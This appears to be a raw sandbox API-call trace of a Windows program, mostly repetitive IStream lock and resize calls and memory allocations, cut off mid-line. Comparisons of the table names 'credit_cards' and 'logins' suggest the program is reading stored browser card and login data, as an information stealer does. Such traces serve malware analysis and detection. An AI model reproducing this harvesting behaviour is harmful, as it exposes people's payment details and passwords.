0x0 [0590.106] LocalFree (hMem=0x2f09968) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.106] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.106] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.106] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.106] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.107] LocalFree (hMem=0x58d970) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.107] LocalFree (hMem=0x58d970) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x24, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x1c6) returned 0x5e3098 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x5e3098) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x1ce) returned 0x5e3270 [0590.107] LocalFree (hMem=0x5e3098) returned 0x0 [0590.107] LocalFree (hMem=0x56ff38) returned 0x0 [0590.107] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.107] lstrcmpiA (lpString1="credit_cards", lpString2="logins") returned -1 [0590.107] LocalFree (hMem=0x58d548) returned 0x0 [0590.107] LocalFree (hMem=0x570078) returned 0x0 [0590.107] LocalFree (hMem=0x56fe98) returned 0x0 [0590.107] LocalFree (hMem=0x58d970) returned 0x0 [0590.107] LocalFree (hMem=0x5e3270) returned 0x0 [0590.107] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x610e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x610e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x610f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.107] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x57ea78, libOffset=0x6110, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.107] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.107] LocalFree (hMem=0x2f09968) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.107] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.107] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.107] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.108] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0xa7) returned 0x59a9c8 [0590.108] LocalFree (hMem=0x5d1978) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x58d548) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.108] LocalFree (hMem=0x58d548) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x5ec250, libOffset=0x36, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.108] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.108] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.108] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.108] lstrcmpiA (lpString1="credit_cards", lpString2="logins") returned -1 [0590.108] LocalFree (hMem=0x58d970) returned 0x0 [0590.108] LocalFree (hMem=0x59a9c8) returned 0x0 [0590.108] LocalFree (hMem=0x570078) returned 0x0 [0590.108] LocalFree (hMem=0x58d548) returned 0x0 [0590.108] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.108] LocalFree (hMem=0x56fe98) returned 0x0 [0590.108] LocalFree (hMem=0x2ef98e0) returned 0x0 [0590.108] IStream:LockRegion (This=0x57ea78, libOffset=0x7f6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.108] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.108] IStream:LockRegion (This=0x57ea78, libOffset=0x7f6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.108] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae4) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x7fa, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52dac7) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6800, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6800, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6801, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6803, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6805, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6807, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.109] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2ef98e0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6808, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x680a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x680c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x680e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6810, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6812, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6814, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6816, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6818, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x6bdc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.109] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x6bdc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x6bdd, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x6bde, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.110] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x57ea78, libOffset=0x6bdf, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.110] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.110] LocalFree (hMem=0x2f09968) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.110] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.110] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.110] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0590.110] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.111] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0590.111] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.111] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0590.111] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.111] IStream:LockRegion 